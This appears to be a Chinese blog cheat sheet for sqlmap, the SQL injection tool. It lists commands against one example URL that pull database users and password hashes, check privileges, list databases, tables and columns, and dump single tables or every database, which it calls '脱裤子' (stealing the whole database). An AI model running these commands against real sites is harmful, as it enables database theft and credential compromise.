sqlmap automatic SQL injection and database takeover tool-Lastme

<span style="font-size: 13px;">获取数据库用户</span>

获取数据库用户

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 -- users -v 1

1	python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 -- users -v 1

获取数据库用户的密码

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --passwords -v 1

1	python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --passwords -v 1

判断当前的权限

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --privileges -v 1

1	python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --privileges -v 1

将所有的数据库列出来

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --dbs -v 1

1	python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --dbs -v 1

显示数据库的所有表

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --tables -D "Database_name" -v 1

1	python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --tables -D "Database_name" -v 1

查询列

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 
--columns -T "Table_name" -D "Database_name" -v 1

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686

--columns -T "Table_name" -D "Database_name" -v 1

查询第1到第4行的内容

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 
--dump -T "Table_name" --start 2 --stop 4 -v 1

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686

--dump -T "Table_name" --start 2 --stop 4 -v 1

将所有的库导出来,脱裤子.

python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --dump-all -v 1

1	python sqlmap.py -u http://www.lastme.com/test.php?sid=1686 --dump-all -v 1

Lastme